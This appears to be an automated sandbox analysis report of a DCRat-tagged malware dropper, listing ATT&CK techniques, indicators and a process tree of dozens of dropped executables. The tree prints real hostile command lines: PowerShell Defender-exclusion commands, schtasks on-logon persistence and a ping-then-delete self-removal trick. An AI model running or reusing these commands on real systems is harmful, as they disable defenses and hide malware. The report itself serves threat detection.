dcrat | 82fbb67bf03714661b75a49245c8fe42141e7b68dda3f97f765eb1f2e00a89a9

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	mQxBvlTA.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
59	5076	test2.exe
63	5076	test2.exe
69	5076	test2.exe
74	1764	ISetup2.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mQxBvlTA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mQxBvlTA.exe

Executes dropped EXE 23 IoCs

pid	Process
4932	mQxBvlTA.exe
4264	xIPJVPDq.exe
4516	caBKMENo.exe
3452	crypted6077866846MVYQY.exe
3440	i1gcbW1E.exe
4524	disable-defender.exe
2388	pclient.exe
3604	responsibilitylead.exe
4432	MStore.exe
1068	Props.exe
3152	wininit.exe
4608	1234.exe
4200	ISetup8.exe
2780	u38o.0.exe
5076	test2.exe
5072	u38o.1.exe
1504	Temp.exe
324	1111.exe
1764	ISetup2.exe
2548	Tester.exe
2400	svchost.exe
1976	MService.exe
3704	555.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral6/files/0x000800000001ab9e-6.dat	themida
behavioral6/memory/4932-31-0x0000000000D80000-0x0000000001E9C000-memory.dmp	themida
behavioral6/memory/4932-36-0x0000000000D80000-0x0000000001E9C000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	45.155.250.90

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	pclient.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mQxBvlTA.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com
24	pastebin.com
25	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
112	ip-api.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral6/files/0x000700000001abac-214.dat	autoit_exe
behavioral6/files/0x000700000001abd5-621.dat	autoit_exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\MService.exe	MStore.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4932	mQxBvlTA.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1448	sc.exe
1032	sc.exe
1848	sc.exe
2012	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
4268	2128	WerFault.exe	115
5744	4972	WerFault.exe	132
5524	6092	WerFault.exe	147
5500	5116	WerFault.exe	161

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u38o.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u38o.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u38o.1.exe

Creates scheduled task(s) 1 TTPs 28 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4136	schtasks.exe
4692	schtasks.exe
1796	schtasks.exe
1428	schtasks.exe
5924	schtasks.exe
3096	schtasks.exe
5188	schtasks.exe
1288	schtasks.exe
3976	schtasks.exe
4604	schtasks.exe
4004	schtasks.exe
620	schtasks.exe
5728	schtasks.exe
1856	schtasks.exe
204	schtasks.exe
5004	schtasks.exe
4300	schtasks.exe
2312	schtasks.exe
3976	schtasks.exe
1380	schtasks.exe
4428	schtasks.exe
2192	schtasks.exe
5052	schtasks.exe
1856	schtasks.exe
5252	schtasks.exe
2436	schtasks.exe
5076	schtasks.exe
5624	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6000	timeout.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5172	PING.EXE
5272	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4264	xIPJVPDq.exe
4264	xIPJVPDq.exe
4264	xIPJVPDq.exe
4264	xIPJVPDq.exe
4516	caBKMENo.exe
4516	caBKMENo.exe
4516	caBKMENo.exe
4516	caBKMENo.exe
3452	crypted6077866846MVYQY.exe
4524	disable-defender.exe
4524	disable-defender.exe
1840	powershell.exe
1840	powershell.exe
1840	powershell.exe
3452	crypted6077866846MVYQY.exe
3452	crypted6077866846MVYQY.exe
3452	crypted6077866846MVYQY.exe
3452	crypted6077866846MVYQY.exe
3452	crypted6077866846MVYQY.exe
3452	crypted6077866846MVYQY.exe
3452	crypted6077866846MVYQY.exe
3452	crypted6077866846MVYQY.exe
1504	Temp.exe
1504	Temp.exe
2548	Tester.exe
2548	Tester.exe
2548	Tester.exe
2548	Tester.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeDebugPrivilege	4488	New Text Document mod.exe
Token: SeDebugPrivilege	4264	xIPJVPDq.exe
Token: SeDebugPrivilege	4516	caBKMENo.exe
Token: SeDebugPrivilege	3452	crypted6077866846MVYQY.exe
Token: SeDebugPrivilege	4524	disable-defender.exe
Token: SeImpersonatePrivilege	4524	disable-defender.exe
Token: SeDebugPrivilege	3604	responsibilitylead.exe
Token: SeDebugPrivilege	4932	mQxBvlTA.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeIncreaseQuotaPrivilege	1840	powershell.exe
Token: SeSecurityPrivilege	1840	powershell.exe
Token: SeTakeOwnershipPrivilege	1840	powershell.exe
Token: SeLoadDriverPrivilege	1840	powershell.exe
Token: SeSystemProfilePrivilege	1840	powershell.exe
Token: SeSystemtimePrivilege	1840	powershell.exe
Token: SeProfSingleProcessPrivilege	1840	powershell.exe
Token: SeIncBasePriorityPrivilege	1840	powershell.exe
Token: SeCreatePagefilePrivilege	1840	powershell.exe
Token: SeBackupPrivilege	1840	powershell.exe
Token: SeRestorePrivilege	1840	powershell.exe
Token: SeShutdownPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeSystemEnvironmentPrivilege	1840	powershell.exe
Token: SeRemoteShutdownPrivilege	1840	powershell.exe
Token: SeUndockPrivilege	1840	powershell.exe
Token: SeManageVolumePrivilege	1840	powershell.exe
Token: 33	1840	powershell.exe
Token: 34	1840	powershell.exe
Token: 35	1840	powershell.exe
Token: 36	1840	powershell.exe
Token: SeDebugPrivilege	1504	Temp.exe
Token: SeImpersonatePrivilege	1504	Temp.exe
Token: SeDebugPrivilege	2548	Tester.exe
Token: SeDebugPrivilege	2400	svchost.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
3152	wininit.exe
3152	wininit.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
3152	wininit.exe
3152	wininit.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe
5072	u38o.1.exe

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 4488 wrote to memory of 4932	4488	New Text Document mod.exe	74
PID 4488 wrote to memory of 4932	4488	New Text Document mod.exe	74
PID 4488 wrote to memory of 4932	4488	New Text Document mod.exe	74
PID 4488 wrote to memory of 4264	4488	New Text Document mod.exe	75
PID 4488 wrote to memory of 4264	4488	New Text Document mod.exe	75
PID 4488 wrote to memory of 4264	4488	New Text Document mod.exe	75
PID 4264 wrote to memory of 4516	4264	xIPJVPDq.exe	76
PID 4264 wrote to memory of 4516	4264	xIPJVPDq.exe	76
PID 4488 wrote to memory of 3452	4488	New Text Document mod.exe	77
PID 4488 wrote to memory of 3452	4488	New Text Document mod.exe	77
PID 4488 wrote to memory of 3452	4488	New Text Document mod.exe	77
PID 4488 wrote to memory of 3440	4488	New Text Document mod.exe	79
PID 4488 wrote to memory of 3440	4488	New Text Document mod.exe	79
PID 4488 wrote to memory of 4524	4488	New Text Document mod.exe	80
PID 4488 wrote to memory of 4524	4488	New Text Document mod.exe	80
PID 4488 wrote to memory of 2388	4488	New Text Document mod.exe	82
PID 4488 wrote to memory of 2388	4488	New Text Document mod.exe	82
PID 4488 wrote to memory of 4432	4488	New Text Document mod.exe	83
PID 4488 wrote to memory of 4432	4488	New Text Document mod.exe	83
PID 2388 wrote to memory of 3604	2388	pclient.exe	84
PID 2388 wrote to memory of 3604	2388	pclient.exe	84
PID 4488 wrote to memory of 1068	4488	New Text Document mod.exe	86
PID 4488 wrote to memory of 1068	4488	New Text Document mod.exe	86
PID 4432 wrote to memory of 4192	4432	MStore.exe	88
PID 4432 wrote to memory of 4192	4432	MStore.exe	88
PID 4192 wrote to memory of 1840	4192	cmd.exe	191
PID 4192 wrote to memory of 1840	4192	cmd.exe	191
PID 4488 wrote to memory of 3152	4488	New Text Document mod.exe	92
PID 4488 wrote to memory of 3152	4488	New Text Document mod.exe	92
PID 4488 wrote to memory of 3152	4488	New Text Document mod.exe	92
PID 4488 wrote to memory of 4608	4488	New Text Document mod.exe	93
PID 4488 wrote to memory of 4608	4488	New Text Document mod.exe	93
PID 4488 wrote to memory of 4608	4488	New Text Document mod.exe	93
PID 4488 wrote to memory of 4200	4488	New Text Document mod.exe	207
PID 4488 wrote to memory of 4200	4488	New Text Document mod.exe	207
PID 4488 wrote to memory of 4200	4488	New Text Document mod.exe	207
PID 4200 wrote to memory of 2780	4200	ISetup8.exe	95
PID 4200 wrote to memory of 2780	4200	ISetup8.exe	95
PID 4200 wrote to memory of 2780	4200	ISetup8.exe	95
PID 4488 wrote to memory of 5076	4488	New Text Document mod.exe	296
PID 4488 wrote to memory of 5076	4488	New Text Document mod.exe	296
PID 4200 wrote to memory of 5072	4200	ISetup8.exe	357
PID 4200 wrote to memory of 5072	4200	ISetup8.exe	357
PID 4200 wrote to memory of 5072	4200	ISetup8.exe	357
PID 4432 wrote to memory of 1504	4432	MStore.exe	99
PID 4432 wrote to memory of 1504	4432	MStore.exe	99
PID 4488 wrote to memory of 324	4488	New Text Document mod.exe	103
PID 4488 wrote to memory of 324	4488	New Text Document mod.exe	103
PID 4488 wrote to memory of 1764	4488	New Text Document mod.exe	320
PID 4488 wrote to memory of 1764	4488	New Text Document mod.exe	320
PID 4488 wrote to memory of 1764	4488	New Text Document mod.exe	320
PID 4488 wrote to memory of 2548	4488	New Text Document mod.exe	105
PID 4488 wrote to memory of 2548	4488	New Text Document mod.exe	105
PID 4488 wrote to memory of 2400	4488	New Text Document mod.exe	106
PID 4488 wrote to memory of 2400	4488	New Text Document mod.exe	106
PID 4432 wrote to memory of 1976	4432	MStore.exe	107
PID 4432 wrote to memory of 1976	4432	MStore.exe	107
PID 4488 wrote to memory of 3704	4488	New Text Document mod.exe	108
PID 4488 wrote to memory of 3704	4488	New Text Document mod.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4488
- C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:4932
- C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4264
- - C:\Users\Admin\AppData\Local\Temp\caBKMENo.exe
    "C:\Users\Admin\AppData\Local\Temp\caBKMENo.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4516
- C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3452
- C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe
  "C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"
  2⤵
  - Executes dropped EXE
  PID:3440
- C:\Users\Admin\AppData\Local\Temp\a\disable-defender.exe
  "C:\Users\Admin\AppData\Local\Temp\a\disable-defender.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4524
- C:\Users\Admin\AppData\Local\Temp\a\pclient.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pclient.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\responsibilitylead.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\responsibilitylead.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3604
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\responsiibilitylead.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\responsiibilitylead.exe
    3⤵
    PID:540
- C:\Users\Admin\AppData\Local\Temp\a\MStore.exe
  "C:\Users\Admin\AppData\Local\Temp\a\MStore.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4192
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionExtension .exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1840
- - C:\Windows\Temp\Temp.exe
    "C:\Windows\Temp\Temp.exe" -s
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- - C:\Windows\SysWOW64\MService.exe
    "C:\Windows\SysWOW64\MService.exe"
    3⤵
    - Executes dropped EXE
    PID:1976
- C:\Users\Admin\AppData\Local\Temp\a\Props.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Props.exe"
  2⤵
  - Executes dropped EXE
  PID:1068
- C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3152
- C:\Users\Admin\AppData\Local\Temp\a\1234.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1234.exe"
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4200
- - C:\Users\Admin\AppData\Local\Temp\u38o.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u38o.0.exe"
    3⤵
    - Executes dropped EXE
    PID:2780
- - C:\Users\Admin\AppData\Local\Temp\u38o.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u38o.1.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
      "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
      4⤵
      PID:5400
- C:\Users\Admin\AppData\Local\Temp\a\test2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test2.exe"
  2⤵
  - Blocklisted process makes network request
  - Executes dropped EXE
  PID:5076
- C:\Users\Admin\AppData\Local\Temp\a\1111.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1111.exe"
  2⤵
  - Executes dropped EXE
  PID:324
- C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"
  2⤵
  - Blocklisted process makes network request
  - Executes dropped EXE
  PID:1764
- C:\Users\Admin\AppData\Local\Temp\a\Tester.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2548
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'
    3⤵
    PID:4316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    PID:3092
- C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2400
- C:\Users\Admin\AppData\Local\Temp\a\555.exe
  "C:\Users\Admin\AppData\Local\Temp\a\555.exe"
  2⤵
  - Executes dropped EXE
  PID:3704
- C:\Users\Admin\AppData\Local\Temp\a\Document.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCEA5.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:2312
- - C:\Users\Admin\AppData\Local\Temp\a\Document.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
    3⤵
    PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit
      4⤵
      PID:5636
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:1796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2532.tmp.bat""
      4⤵
      PID:3144
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:6000
    - - C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        5⤵
        
        PID:5212
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        6⤵
        
        PID:5176
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
        6⤵
        
        PID:2660
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE361.tmp"
        6⤵
        Creates scheduled task(s)
        
        PID:1428
      - C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        6⤵
        
        PID:6132
- C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
  2⤵
  PID:3904
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
    3⤵
    PID:1412
- C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe
  "C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"
  2⤵
  PID:2304
- C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"
  2⤵
  PID:2380
- C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"
  2⤵
  PID:2128
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:844
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2600
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4888
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 772
    3⤵
    - Program crash
    PID:4268
- C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"
  2⤵
  PID:216
- C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"
  2⤵
  PID:3320
- C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"
  2⤵
  PID:1792
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5400
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5424
  - - C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
      4⤵
      PID:5764
  - - C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
      4⤵
      PID:5804
- C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"
  2⤵
  PID:4480
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDHIIIIEHC.exe"
    3⤵
    PID:5756
  - - C:\Users\Admin\AppData\Local\Temp\GDHIIIIEHC.exe
      "C:\Users\Admin\AppData\Local\Temp\GDHIIIIEHC.exe"
      4⤵
      PID:768
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GDHIIIIEHC.exe
        5⤵
        
        PID:5644
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        6⤵
        Runs ping.exe
        
        PID:5272
- C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"
  2⤵
  PID:2672
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
    3⤵
    PID:5184
  - - C:\Windows\SysWOW64\PING.EXE
      ping 2.2.2.2 -n 1 -w 3000
      4⤵
      Runs ping.exe
      PID:5172
- C:\Users\Admin\AppData\Local\Temp\a\new1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\new1.exe"
  2⤵
  PID:3172
- C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"
  2⤵
  PID:3584
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5368
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5392
- C:\Users\Admin\AppData\Local\Temp\a\razdva.exe
  "C:\Users\Admin\AppData\Local\Temp\a\razdva.exe"
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 752
    3⤵
    - Program crash
    PID:5744
- C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"
  2⤵
  PID:5272
- - C:\Users\Admin\AppData\Local\Temp\u42g.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u42g.0.exe"
    3⤵
    PID:5972
- - C:\Users\Admin\AppData\Local\Temp\u42g.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u42g.1.exe"
    3⤵
    PID:3036
- C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
  2⤵
  PID:5784
- - C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
    "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
    3⤵
    PID:540
- C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"
  2⤵
  PID:6092
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 764
    3⤵
    - Program crash
    PID:5524
- C:\Users\Admin\AppData\Local\Temp\a\june.exe
  "C:\Users\Admin\AppData\Local\Temp\a\june.exe"
  2⤵
  PID:5740
